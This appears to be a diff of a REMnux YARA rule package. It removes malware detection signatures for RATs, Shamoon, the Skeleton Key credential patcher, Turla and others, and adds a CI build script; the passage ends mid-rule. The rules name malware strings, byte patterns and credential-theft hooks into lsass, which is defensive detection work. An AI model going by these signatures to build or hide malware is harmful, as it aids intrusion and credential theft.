diff -Nru remnux-rules-0.0.3/yara/RAT_Terminator.yara remnux-rules-0.0.4/yara/RAT_Terminator.yara
--- remnux-rules-0.0.3/yara/RAT_Terminator.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/RAT_Terminator.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,40 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule TerminatorRat : rat 
-{
-	meta:
-		description = "Terminator RAT" 
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-10-24"
-		filetype = "memory"
-		version = "1.0" 
-		ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html" 
-
-	strings:
-		$a = "Accelorator"
-		$b = "<html><title>12356</title><body>"
-
-	condition:
-		all of them
-}
-
-
-
-rule TROJAN_Notepad_shell_crew {
-        meta:
-                author = "RSA_IR"
-                Date     = "4Jun13"
-                File     = "notepad.exe v 1.1"
-                MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
-        strings:
-                $s1 = "75BAA77C842BE168B0F66C42C7885997"
-                $s2 = "B523F63566F407F3834BCC54AAA32524"
-        condition:
-                $s1 or $s2
-}
diff -Nru remnux-rules-0.0.3/yara/RCS.yara remnux-rules-0.0.4/yara/RCS.yara
--- remnux-rules-0.0.3/yara/RCS.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/RCS.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,73 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule RCS_Backdoor
-{
-    meta:
-        description = "Hacking Team RCS Backdoor"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $filter1 = "$debug3"
-        $filter2 = "$log2"
-        $filter3 = "error2"
-
-        $debug1 = /\- (C)hecking components/ wide ascii
-        $debug2 = /\- (A)ctivating hiding system/ wide ascii
-        $debug3 = /(f)ully operational/ wide ascii
-
-        $log1 = /\- Browser activity \(FF\)/ wide ascii
-        $log2 = /\- Browser activity \(IE\)/ wide ascii
-        
-        // Cause false positives.
-        //$log3 = /\- About to call init routine at %p/ wide ascii
-        //$log4 = /\- Calling init routine at %p/ wide ascii
-
-        $error1 = /\[Unable to deploy\]/ wide ascii
-        $error2 = /\[The system is already monitored\]/ wide ascii
-
-    condition:
-        (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*)
-}
-
-rule RCS_Scout
-{
-    meta:
-        description = "Hacking Team RCS Scout"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $filter1 = "$engine5"
-        $filter2 = "$start4"
-        $filter3 = "$upd2"
-        $filter4 = "$lookma6"
-
-        $engine1 = /(E)ngine started/ wide ascii
-        $engine2 = /(R)unning in background/ wide ascii
-        $engine3 = /(L)ocking doors/ wide ascii
-        $engine4 = /(R)otors engaged/ wide ascii
-        $engine5 = /(I)\'m going to start it/ wide ascii
-
-        $start1 = /Starting upgrade\!/ wide ascii
-        $start2 = /(I)\'m going to start the program/ wide ascii
-        $start3 = /(i)s it ok\?/ wide ascii
-        $start4 = /(C)lick to start the program/ wide ascii
-
-        $upd1 = /(U)pdJob/ wide ascii
-        $upd2 = /(U)pdTimer/ wide ascii
-
-        $lookma1 = /(O)wning PCI bus/ wide
-        $lookma2 = /(F)ormatting bios/ wide
-        $lookma3 = /(P)lease insert a disk in drive A:/ wide
-        $lookma4 = /(U)pdating CPU microcode/ wide
-        $lookma5 = /(N)ot sure what's happening/ wide
-        $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide        
-
-    condition:
-        (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*)
-}
-
diff -Nru remnux-rules-0.0.3/yara/README.capabilities remnux-rules-0.0.4/yara/README.capabilities
--- remnux-rules-0.0.3/yara/README.capabilities	2015-05-08 13:27:55.000000000 +0000
+++ remnux-rules-0.0.4/yara/README.capabilities	1970-01-01 00:00:00.000000000 +0000
@@ -1,3 +0,0 @@
-The capabilities.yara file is from the Malware Analyst's Cookbook book at https://malwarecookbook.googlecode.com/svn/trunk/3/5/capabilities.yara
-
-The file is distributed for free, but the exact license is unknow. It is most likely copyright by authors of the Malware Analyst's Cookbook book: Michael Ligh, Steven Adair, Blake Hartstein.
diff -Nru remnux-rules-0.0.3/yara/README.md remnux-rules-0.0.4/yara/README.md
--- remnux-rules-0.0.3/yara/README.md	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/README.md	2016-06-24 20:07:22.000000000 +0000
@@ -1,3 +1,5 @@
+[![Build Status](https://travis-ci.org/Yara-Rules/rules.svg)](https://travis-ci.org/Yara-Rules/rules)
+
 # Project
 
 This project covers the need of a group of IT Security Researches to have a single repository where different Yara signatures are compiled, classified and kept as up to date as possible, and begin as an open source community for collecting Yara rules. Our Yara ruleset is under the GNU-GPLv2 license and open to any user or organization, as long as you use it under this license.
@@ -44,6 +46,14 @@
 
 In this section you will find Yara Rules aimed to detect well-known sofware packers, that can be used by malware to hide itself.
 
+## Malware Mobile
+
+In this section you will find Yara rules specialised on the indentification of well-known mobile malware.
+
+Many rules in this section use Androguard module developed by people at https://koodous.com/. 
+
+You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+
 # Contact 
 
 Webpage: http://yararules.com
diff -Nru remnux-rules-0.0.3/yara/Regsubdat.yara remnux-rules-0.0.4/yara/Regsubdat.yara
--- remnux-rules-0.0.3/yara/Regsubdat.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Regsubdat.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,54 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule RegSubDatCode : RegSubDat Family 
-{
-    meta:
-        description = "RegSubDat code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-14"
-    
-    strings:
-        // decryption loop
-        $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? }
-        // push then pop values
-        $ = { 68 FF FF 7F 00 5? }
-        $ = { 68 FF 7F 00 00 5? }
-    
-    condition:
-        all of them
-}
-
-rule RegSubDatStrings : RegSubDat Family
-{
-    meta:
-        description = "RegSubDat Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-14"
-        
-    strings:
-        $avg1 = "Button"
-        $avg2 = "Allow"
-        $avg3 = "Identity Protection"
-        $avg4 = "Allow for all"
-        $avg5 = "AVG Firewall Asks For Confirmation"
-        $mutex = "0x1A7B4C9F"
-        
-    condition:
-       all of ($avg*) or $mutex
-}
-
-rule RegSubDat : Family
-{
-    meta:
-        description = "RegSubDat"
-        author = "Seth Hardy"
-        last_modified = "2014-07-14"
-        
-    condition:
-        RegSubDatCode or RegSubDatStrings
-}
diff -Nru remnux-rules-0.0.3/yara/Safenet.yara remnux-rules-0.0.4/yara/Safenet.yara
--- remnux-rules-0.0.3/yara/Safenet.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Safenet.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,50 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule SafeNetCode : SafeNet Family 
-{
-    meta:
-        description = "SafeNet code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-16"
-        
-    strings:
-        // add edi, 14h; cmp edi, 50D0F8h
-        $ = { 83 C7 14 81 FF F8 D0 40 00 }
-    condition:
-        any of them
-}
-
-rule SafeNetStrings : SafeNet Family
-{
-    meta:
-        description = "Strings used by SafeNet"
-        author = "Seth Hardy"
-        last_modified = "2014-07-16"
-        
-    strings:
-        $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
-        $ = "/safe/record.php"
-        $ = "_Rm.bat" wide ascii
-        $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" wide ascii
-        $ = "Ext.org" wide ascii
-        
-    condition:
-        any of them
-
-}
-
-rule SafeNet : Family
-{
-    meta:
-        description = "SafeNet family"
-        
-    condition:
-        SafeNetCode or SafeNetStrings
-        
-}
-
diff -Nru remnux-rules-0.0.3/yara/Scarhikn.yara remnux-rules-0.0.4/yara/Scarhikn.yara
--- remnux-rules-0.0.3/yara/Scarhikn.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Scarhikn.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,57 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule ScarhiknStrings : Scarhikn Family
-{
-    meta:
-        description = "Scarhikn Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $ = "9887___skej3sd"
-        $ = "haha123"
-        
-    condition:
-       any of them
-}
-
-
-
-rule ScarhiknCode : Scarhikn Family 
-{
-    meta:
-        description = "Scarhikn code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-    
-    strings:
-        // decryption
-        $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
-        $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
-    
-    condition:
-        any of them
-}
-
-rule Scarhikn : Family
-{
-    meta:
-        description = "Scarhikn"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    condition:
-        ScarhiknCode or ScarhiknStrings
-}
-
-
-
-
-
-
-
diff -Nru remnux-rules-0.0.3/yara/Scieron.yara remnux-rules-0.0.4/yara/Scieron.yara
--- remnux-rules-0.0.3/yara/Scieron.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Scieron.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,34 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Scieron
-{
-    meta:
-        author = "Symantec Security Response"
-        ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
-        date = "22.01.15"
-
-    strings:
-        // .text:10002069 66 83 F8 2C                       cmp     ax, ','
-        // .text:1000206D 74 0C                             jz      short loc_1000207B
-        // .text:1000206F 66 83 F8 3B                       cmp     ax, ';'
-        // .text:10002073 74 06                             jz      short loc_1000207B
-        // .text:10002075 66 83 F8 7C                       cmp     ax, '|'
-        // .text:10002079 75 05                             jnz     short loc_10002080
-        $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05}
-        
-        // .text:10001D83 83 F8 09                          cmp     eax, 9          ; switch 10 cases
-        // .text:10001D86 0F 87 DB 00 00 00                 ja      loc_10001E67    ; jumptable 10001D8C default case
-        // .text:10001D8C FF 24 85 55 1F 00+                jmp     ds:off_10001F55[eax*4] ; switch jump
-        $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24}
-        
-        $str1  = "IP_PADDING_DATA" wide ascii
-        $str2  = "PORT_NUM" wide ascii
-        
-    condition:
-        all of them
-}
diff -Nru remnux-rules-0.0.3/yara/ShadowTech.yara remnux-rules-0.0.4/yara/ShadowTech.yara
--- remnux-rules-0.0.3/yara/ShadowTech.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/ShadowTech.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,23 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule ShadowTech
-{
-    meta:
-        description = "ShadowTech RAT"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $string1 = /\#(S)trings/
-        $string2 = /\#(G)UID/
-        $string3 = /\#(B)lob/
-        $string4 = /(S)hadowTech Rat\.exe/
-        $string5 = /(S)hadowTech_Rat/
-
-    condition:
-        all of them
-}
diff -Nru remnux-rules-0.0.3/yara/Shamoon.yara remnux-rules-0.0.4/yara/Shamoon.yara
--- remnux-rules-0.0.3/yara/Shamoon.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Shamoon.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,20 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule CrowdStrike_Shamoon_DroppedFile { 
-	meta:
-		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
-		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
-	strings:
-		$testn123 = "test123" wide
-		$testn456 = "test456" wide
-		$testn789 = "test789" wide
-		$testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
-	condition:
-		(any of ($testn*) or $pingcmd) and $testdomain
-}
diff -Nru remnux-rules-0.0.3/yara/Skeleton.yara remnux-rules-0.0.4/yara/Skeleton.yara
--- remnux-rules-0.0.3/yara/Skeleton.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Skeleton.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,49 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule skeleton_key_patcher
-{
-	meta:
-		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
-		author = "Dell SecureWorks Counter Threat Unit"
-		reference = "http://goo.gl/aAk3lN"
-		date = "2015/01/13"
-		score = 70
-	strings:
-		$target_process = "lsass.exe" wide
-		$dll1 = "cryptdll.dll"
-		$dll2 = "samsrv.dll"
-
-		$name = "HookDC.dll"
-
-		$patched1 = "CDLocateCSystem"
-		$patched2 = "SamIRetrievePrimaryCredentials"
-		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
-	condition:
-		all of them
-}
-
-rule skeleton_key_injected_code
-{
-	meta:
-		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
-		author = "Dell SecureWorks Counter Threat Unit"
-		reference = "http://goo.gl/aAk3lN"
-		date = "2015/01/13"
-		score = 70
-	strings:
-		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
-
-		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
-
-		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
-
-		$patch_SamIRetrieveMultiplePrimaryCredential  = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
-
-	condition:
-		any of them
-}
diff -Nru remnux-rules-0.0.3/yara/Stealer.yara remnux-rules-0.0.4/yara/Stealer.yara
--- remnux-rules-0.0.3/yara/Stealer.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Stealer.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,23 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule universal_1337_stealer_serveur : Stealer
-{
-	meta:
-		author="Kevin Falcoz"
-		date="24/02/2013"
-		description="Universal 1337 Stealer Serveur"
-		
-	strings:
-		$signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/
-		$signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/
-		$signature3={46 54 50 7E} /*FTP~*/
-		$signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/
-		
-	condition:
-		$signature1 and $signature2 or $signature3 and $signature4
-}
diff -Nru remnux-rules-0.0.3/yara/Surtr.yara remnux-rules-0.0.4/yara/Surtr.yara
--- remnux-rules-0.0.3/yara/Surtr.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Surtr.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,138 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule RSharedStrings : Surtr Family {
-	meta:
-		description = "identifiers for remote and gmremote"
-		author = "Katie Kleemola"
-		last_updated = "07-21-2014"
-	
-	strings:
-		$ = "nView_DiskLoydb" wide
-		$ = "nView_KeyLoydb" wide
-		$ = "nView_skins" wide
-		$ = "UsbLoydb" wide
-		$ = "%sBurn%s" wide
-		$ = "soul" wide
-
-	condition:
-		any of them
-
-}
-
-rule RemoteStrings : Remote Variant Surtr Family {
-	meta:
-		description = "indicators for remote.dll - surtr stage 2"
-		author = "Katie Kleemola"
-		last_updated = "07-21-2014"
-	
-	strings:
-		$ = "\x00Remote.dll\x00"
-		$ = "\x00CGm_PlugBase::"
-		$ = "\x00ServiceMain\x00_K_H_K_UH\x00"
-		$ = "\x00_Remote_\x00" wide
-	condition:
-		any of them
-}
-
-rule GmRemoteStrings : GmRemote Variant Family Surtr {
-	meta:
-		description = "identifiers for gmremote: surtr stage 2"
-		author = "Katie Kleemola"
-		last_updated = "07-21-2014"
-	
-	strings:
-		$ = "\x00x86_GmRemote.dll\x00"
-		$ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
-		$ = "\x00GmShutPoint\x00"
-		$ = "\x00GmRecvPoint\x00"
-		$ = "\x00GmInitPoint\x00"
-		$ = "\x00GmVerPoint\x00"
-		$ = "\x00GmNumPoint\x00"
-		$ = "_Gt_Remote_" wide
-		$ = "%sBurn\\workdll.tmp" wide
-	
-	condition:
-		any of them
-
-}
-
-
-rule GmRemote : Family Surtr Variant GmRemote {
-	meta:
-		description = "identifier for gmremote"
-		author = "Katie Kleemola"
-		last_updated = "07-25-2014"
-	
-	condition:
-		RSharedStrings and GmRemoteStrings
-}
-
-rule Remote : Family Surtr Variant Remote {
-	meta:
-		description = "identifier for remote"
-		author = "Katie Kleemola"
-		last_updated = "07-25-2014"
-	
-	condition:
-		RSharedStrings and RemoteStrings
-}
-
-rule SurtrStrings : Surtr Family {	
-	meta: 
-		author = "Katie Kleemola"
-		description = "Strings for Surtr"
-		last_updated = "2014-07-16"
-
-	strings:
-		$ = "\x00soul\x00"
-		$ = "\x00InstallDll.dll\x00"
-		$ = "\x00_One.dll\x00"
-		$ = "_Fra.dll"
-		$ = "CrtRunTime.log"
-		$ = "Prod.t"
-		$ = "Proe.t"
-		$ = "Burn\\"
-		$ = "LiveUpdata_Mem\\"
-
-	condition:
-		any of them
-
-}
-
-rule SurtrCode : Surtr Family {
-	meta: 
-		author = "Katie Kleemola"
-		description = "Code features for Surtr Stage1"
-		last_updated = "2014-07-16"
-	
-	strings:
-		//decrypt config
-		$ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
-		//if Burn folder name is not in strings
-		$ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
-		//mov char in _Fire
-		$ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
-
-	condition:
-		any of them
-
-}
-
-rule Surtr : Family {
-	meta:
-		author = "Katie Kleemola"
-		description = "Rule for Surtr Stage One"
-		last_updated = "2014-07-16"
-
-	condition:
-		SurtrStrings or SurtrCode
-
-}
-
-
-
diff -Nru remnux-rules-0.0.3/yara/T5000.yara remnux-rules-0.0.4/yara/T5000.yara
--- remnux-rules-0.0.3/yara/T5000.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/T5000.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,44 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule T5000Strings : T5000 Family
-{
-    meta:
-        description = "T5000 Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-26"
-        
-    strings:
-        $ = "_tmpR.vbs"
-        $ = "_tmpg.vbs"
-        $ = "Dtl.dat" wide ascii
-        $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
-        $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
-        $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
-        $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
-        $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
-        $ = "A59CF429-D0DD-4207-88A1-04090680F714"
-        $ = "utd_CE31" wide ascii
-        $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
-        $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
-        $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
-        $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
-        
-    condition:
-       any of them
-}
-
-rule T5000 : Family
-{
-    meta:
-        description = "T5000"
-        author = "Seth Hardy"
-        last_modified = "2014-06-26"
-        
-    condition:
-        T5000Strings
-}
diff -Nru remnux-rules-0.0.3/yara/.travis.yml remnux-rules-0.0.4/yara/.travis.yml
--- remnux-rules-0.0.3/yara/.travis.yml	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/.travis.yml	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,34 @@
+language: c
+sudo: required
+#dist: trusty
+before_install:
+# Yara
+  - wget https://github.com/plusvic/yara/archive/v3.4.0.tar.gz -O yara.tar.gz
+  - tar -xzvf yara.tar.gz
+# Androguard for Yara
+  - wget https://raw.githubusercontent.com/Koodous/androguard-yara/master/androguard.c -O yara-3.4.0/libyara/modules/androguard.c
+  - wget https://raw.githubusercontent.com/Koodous/androguard-yara/master/dist/yara-3.4.0/libyara/modules/module_list -O yara-3.4.0/libyara/modules/module_list
+  - wget https://raw.githubusercontent.com/Koodous/androguard-yara/master/dist/yara-3.4.0/libyara/Makefile.am -O yara-3.4.0/libyara/Makefile.am
+# libjansson
+  - wget http://www.digip.org/jansson/releases/jansson-2.7.tar.gz
+  - tar -xzvf jansson-2.7.tar.gz
+  - cd jansson-2.7
+  - ./configure
+  - make
+  - sudo make install
+  
+# Compile Yara
+  - cd ../yara-3.4.0
+  - ./bootstrap.sh
+  - ./configure --enable-cuckoo
+  - make
+  - sudo make install
+  - sudo ldconfig
+  - cd ../
+
+script:
+  - echo "test" > testfile
+  - echo "{}" > androguard_report.json
+  - FALLO=0
+  - for i in $(find . -type f -name "*.yara" ; find . -type f -name "*.yar"); do echo $i; yara -x androguard=androguard_report.json $i testfile; if [[ $? -ne 0 ]]; then FALLO=1; fi; done
+  - exit $FALLO
diff -Nru remnux-rules-0.0.3/yara/Turla.yara remnux-rules-0.0.4/yara/Turla.yara
--- remnux-rules-0.0.3/yara/Turla.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Turla.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule WaterBug_turla_dll 
-{
-    meta:
-        description = "Symantec Waterbug Attack - Trojan Turla DLL"
-        author = "Symantec Security Response"
-        date = "22.01.2015"
-        reference = "http://t.co/rF35OaAXrl"   
-
-    strings:
-        $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/
-   
-    condition:
-        pe.exports("ee") and $a
-}
diff -Nru remnux-rules-0.0.3/yara/Urausy.yara remnux-rules-0.0.4/yara/Urausy.yara
--- remnux-rules-0.0.3/yara/Urausy.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Urausy.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule urausy_skype_dat {
-	meta:
-		author = "AlienVault Labs"
-		description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
-	strings:
-		$a = "skype.dat" ascii wide
-		$b = "skype.ini" ascii wide
-		$win1 = "CreateWindow"
-		$win2 = "YIWEFHIWQ" ascii wide
-		$desk1 = "CreateDesktop"
-		$desk2 = "MyDesktop" ascii wide
-	condition:
-		$a and $b and (all of ($win*) or all of ($desk*))
-}
diff -Nru remnux-rules-0.0.3/yara/Vidgrab.yara remnux-rules-0.0.4/yara/Vidgrab.yara
--- remnux-rules-0.0.3/yara/Vidgrab.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Vidgrab.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,53 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule VidgrabCode : Vidgrab Family 
-{
-    meta:
-        description = "Vidgrab code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-20"
-        
-    strings:
-        $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
-        // add eax, ecx; xor byte ptr [eax], ??h; inc ecx
-        $xorloop = { 03 C1 80 30 (66 | 58) 41 }
-        $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
-        
-    condition:
-        all of them
-}
-
-rule VidgrabStrings : Vidgrab Family
-{
-    meta:
-        description = "Vidgrab Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-20"
-        
-    strings:
-        $ = "IDI_ICON5" wide ascii
-        $ = "starter.exe"
-        $ = "wmifw.exe"
-        $ = "Software\\rar"
-        $ = "tmp092.tmp"
-        $ = "temp1.exe"
-        
-    condition:
-       3 of them
-}
-
-rule Vidgrab : Family
-{
-    meta:
-        description = "Vidgrab"
-        author = "Seth Hardy"
-        last_modified = "2014-06-20"
-        
-    condition:
-        VidgrabCode or VidgrabStrings
-}
diff -Nru remnux-rules-0.0.3/yara/Warp.yara remnux-rules-0.0.4/yara/Warp.yara
--- remnux-rules-0.0.3/yara/Warp.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Warp.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,48 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule WarpCode : Warp Family 
-{
-    meta:
-        description = "Warp code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-10"
-    
-    strings:
-        // character replacement
-        $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
-    
-    condition:
-        any of them
-}
-
-rule WarpStrings : Warp Family
-{
-    meta:
-        description = "Warp Identifying Strings"
-        author = "Seth Hardy"
